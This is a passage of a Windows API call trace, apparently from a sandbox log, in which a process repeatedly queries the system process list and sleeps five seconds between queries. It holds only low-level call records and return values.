returned 0x0 [0212.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.586] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.600] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.608] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.617] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.632] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.653] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.660] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.667] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.675] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.684] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.720] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.730] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.740] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.743] NtQuerySystemInformation (in: 